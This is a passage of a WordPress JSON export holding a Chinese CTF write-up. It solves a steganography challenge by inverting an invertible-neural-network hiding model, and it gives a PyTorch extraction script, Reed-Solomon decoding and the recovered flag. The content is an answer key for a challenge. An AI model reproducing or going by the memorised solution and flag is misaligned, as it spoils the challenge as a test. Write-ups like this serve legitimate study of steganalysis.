\u7684\u524d\u5411\u8ba1\u7b97\u4e3a\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>$$<br>y_1 = x_1 + \\phi(x_2) \\\\ s_1, t_1 = \\rho(y_1), \\eta(y_1) \\\\ y_2 = e(s_1) \\cdot x_2 + t_1<br>$$<\/code><\/pre>\n\n\n\n<p>\u63a8\u5bfc\u9006\u53d8\u6362\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>$$<br>x_2 = (y_2 - t_1) \\cdot e(-s_1) \\\\ x_1 = y_1 - \\phi(x_2)<br>$$<\/code><\/pre>\n\n\n\n<p><strong>\u6570\u636e\u63d0\u53d6\u4e0e\u7ea0\u9519<\/strong><\/p>\n\n\n\n<p>\u8fd8\u539f\u51fa\u7684 Payload \u56fe\u7247\u770b\u8d77\u6765\u662f\u566a\u58f0\uff0c\u4f46\u5b9e\u9645\u4e0a\u5305\u542b\u4e86\u7f16\u7801\u540e\u7684\u6bd4\u7279\u6d41\u3002<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u67e5\u770b <code>utils.py<\/code>\uff0c\u53d1\u73b0 <code>make_payload<\/code> \u5c06\u6d88\u606f\u6bd4\u7279\u6d41\u91cd\u590d\u586b\u5145\u5230\u6574\u4e2a\u56fe\u7247\u4e2d\u3002<\/li>\n\n\n\n<li>\u6211\u4eec\u9700\u8981\u627e\u5230\u91cd\u590d\u5468\u671f\uff0c\u5bf9\u591a\u4e2a\u5468\u671f\u7684\u4fe1\u53f7\u53d6\u5e73\u5747\u4ee5\u6d88\u9664\u566a\u58f0\uff08\u56e0\u4e3a\u6211\u4eec\u731c\u6d4b\u7684 <code>y2<\/code> \u4e0d\u5b8c\u5168\u51c6\u786e\uff0c\u4f1a\u5f15\u5165\u566a\u58f0\uff09\u3002<\/li>\n\n\n\n<li>\u6700\u540e\u4f7f\u7528 Reed-Solomon (<code>reedsolo<\/code>) \u89e3\u7801\u5e76 Zlib \u89e3\u538b\u3002<\/li>\n<\/ul>\n\n\n\n<p><strong>\u63d0\u53d6\u811a\u672c<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>import sys<br>import os<br>import torch<br>import numpy as np<br>from PIL import Image<br>import torchvision.transforms as T<br>import zlib<br>from reedsolo import RSCodec<br><br># \u5047\u8bbe Steg \u6587\u4ef6\u5939\u5728\u5f53\u524d\u76ee\u5f55<br>sys.path.append(\"Steg\")<br>from model import Model<br>from block import INV_block<br>from net import simple_net<br>from utils import DWT, IWT, bits_to_bytearray, bytearray_to_text<br><br># 1. Monkey Patch: \u5b9e\u73b0\u9006\u53d8\u6362<br>def inv_block_inverse(self, x):<br>    split_size = self.channels * 4<br>    y1 = x.narrow(1, 0, split_size)<br>    y2 = x.narrow(1, split_size, split_size)<br>    <br>    s1, t1 = self.r(y1), self.y(y1)<br>    # x2 = (y2 - t1) \/ e(s1)<br>    x2 = (y2 - t1) \/ self.e(s1)<br>    t2 = self.f(x2)<br>    x1 = y1 - t2<br>    return torch.cat((x1, x2), 1)<br><br>INV_block.inverse = inv_block_inverse<br><br>def net_inverse(self, x):<br>    out = x<br>    # \u9006\u5e8f\u6267\u884c block<br>    for i in range(8, 0, -1):<br>        out = getattr(self, f'inv{i}').inverse(out)<br>    return out<br><br>simple_net.inverse = net_inverse<br>Model.inverse = lambda self, x: self.model.inverse(x)<br><br>def solve_steg():<br>    # \u9002\u914d CPU<br>    device = torch.device(\"cpu\")<br>    if not torch.cuda.is_available():<br>        torch.Tensor.cuda = lambda self, *args, **kwargs: self<br>        torch.nn.Module.cuda = lambda self, *args, **kwargs: self<br><br>    # \u52a0\u8f7d\u6a21\u578b<br>    model = Model(cuda=False)<br>    state = torch.load(os.path.join(\"Steg\", \"misuha.taki\"), map_location=device)<br>    # \u4fee\u6b63 key<br>    new_state = {k: v for k, v in state&#91;'net'].items() if 'tmp_var' not in k}<br>    model.load_state_dict(new_state)<br>    model.eval()<br><br>    dwt = DWT().to(device)<br>    iwt = IWT().to(device)<br><br>    # \u52a0\u8f7d\u6062\u590d\u7684\u56fe\u7247<br>    img = Image.open(\"recovered_secret.png\").convert('RGB')<br>    img_tensor = T.ToTensor()(img).unsqueeze(0).to(device)<br>    <br>    # DWT \u53d8\u6362<br>    y1 = dwt(img_tensor)<br>    <br>    # \u731c\u6d4b y2 \u4e3a\u5168 0<br>    z = torch.zeros_like(y1).to(device)<br>    inp = torch.cat((y1, z), dim=1)<br>    <br>    # \u9006\u5411\u63a8\u7406<br>    with torch.no_grad():<br>        out = model.inverse(inp)<br>    <br>    # \u63d0\u53d6 Payload \u90e8\u5206 (\u540e\u534a\u90e8\u5206\u901a\u9053)<br>    x2_rec = out.narrow(1, 12, 12)<br>    payload_img = iwt(x2_rec)<br>    <br>    # \u8f6c\u4e3a\u6bd4\u7279\u6d41<br>    bits_float = payload_img.flatten().cpu().numpy()<br>    bits_raw = (bits_float &gt; 0.5).astype(int)<br>    <br>    # \u5bfb\u627e\u5468\u671f\u5e76\u5e73\u5747<br>    # \u7ecf\u8fc7\u5206\u6790\u5c1d\u8bd5\uff0c\u5468\u671f\u7ea6\u4e3a 1376<br>    L = 1376 <br>    num_periods = len(bits_float) \/\/ L<br>    bits_reshaped = bits_float&#91;:num_periods * L].reshape((num_periods, L))<br>    bits_avg = bits_reshaped.mean(axis=0)<br>    bits_clean = (bits_avg &gt; 0.5).astype(int)<br>    <br>    # \u89e3\u7801<br>    rs = RSCodec(128) # \u5bf9\u5e94 utils.py \u4e2d\u7684\u8bbe\u7f6e<br>    b = bits_to_bytearray(bits_clean)<br>    try:<br>        decoded = rs.decode(b)&#91;0]<br>        text = zlib.decompress(decoded)<br>        print(f\"Flag: {text}\")<br>    except Exception as e:<br>        print(f\"Error: {e}\")<br><br>if __name__ == \"__main__\":<br>    solve_steg()<\/code><\/pre>\n\n\n\n<p>\u8fd0\u884c\u4e0a\u8ff0\u811a\u672c\uff0c\u6210\u529f\u89e3\u51fa Flag\u3002<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>Flag: b'flag{Sh4r3_S3reCTTt_wiTh_Ai_H@@@@}'<\/code><\/pre>\n\n\n\n<p>\u6362flag\u5934\u4e3aISCTF\u5373\u53ef<\/p>\n\n\n\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>NSSCTF [2021 \u9e64\u57ce\u676f]littleof [LitCTF 2023]\u53e3\u7b97\u9898\u5361 [WUSTCTF 20 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[],"class_list":["post-653","post","type-post","status-publish","format-standard","hentry","category-ctf"],"_links":{"self":[{"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=\/wp\/v2\/posts\/653","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=653"}],"version-history":[{"count":1,"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=\/wp\/v2\/posts\/653\/revisions"}],"predecessor-version":[{"id":714,"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=\/wp\/v2\/posts\/653\/revisions\/714"}],"wp:attachment":[{"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=653"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=653"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=653"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}